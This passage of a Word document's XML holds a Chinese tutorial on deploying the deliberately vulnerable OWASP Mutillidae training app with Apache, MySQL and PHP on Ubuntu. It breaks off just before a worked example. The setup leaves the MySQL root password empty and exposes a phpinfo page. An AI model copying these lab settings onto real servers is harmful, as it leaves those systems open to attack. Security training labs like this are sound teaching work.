    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo vi /etc/apache2/mods-enabled/dir.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;IfModule mod_dir.c&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/IfModule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3）安装mysql数据库，密码可以默认为空，也可给root用户设置密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo mysql_install_db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4）安装php组件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo apt-get install php5 php5-mysql php-pear php5-gd  php5-mcrypt php5-curl libapache2-mod-php5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5）可以验证下php组件是否正常工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新建个php文件：</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo vi /var/www/html/phpinfo.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在文件中添加信息：</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;?php phpinfo(); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后在浏览器中访问下：</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:cs="Courier New"/>
            <w:color w:val="auto"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://localhost/phpinfo.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正常情况下能显示php的信息页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6）下载Mutillidae的项目文件放到</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>路径下（apache服务器默认提供的web服务的路径）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以直接git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cd /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo git clone git://git.code.sf.net/p/mutillidae/git mutillidae</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也可以到网站上下载zip的压缩包解压到对应的路径下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载网站：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7）使用mutillidae：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直接在浏览器中访问如下地址即可打开mutillidae漏洞平台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://localhost/html/mutillidae</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首次打开使用mutillidae时可能会遇到数据库密码不对的情况，需要确保mutillidae配置中使用的数据库账号和密码与之前安装的mysql时设置的账户密码一致：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改mutillidae的数据库密码配置的方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo vi /var/www/html/mutillidae/classes/MySQLHandler.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"$mMySQLDatabasePassword"</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00207330">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用浏览器访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://yourip/mutillidae/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ECEBF36" wp14:editId="0C8A6911">
            <wp:extent cx="5274310" cy="39147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14775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在顶部的菜单栏中可以进行安全等级的切换（默认level为0，非常不安全），漏洞提示切换（默认漏洞提示开关时使能的）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在页面的左边菜单栏包含时mutillidae收录的一些漏洞分类，主要是owasp收录的17年，13年，10年排名前10的漏洞类型等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择其中一项具体的漏洞打开页面，如下图操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34ED5AC3" wp14:editId="10BFBD6A">
            <wp:extent cx="5274310" cy="4054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054475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>可以看到每个页面上包含Hints</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Videos</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>，这部分就是提示每个页面上包含的所有漏洞信息，点开可以看到对应漏洞的信息和利用方法，以及漏洞利用指</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>导的视屏链接信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D2456E" wp14:editId="6BBE5018">
            <wp:extent cx="5274310" cy="38423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842385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就可以参照漏洞提示文档中描述的信息和方法进行漏洞的利用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器中打开</w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
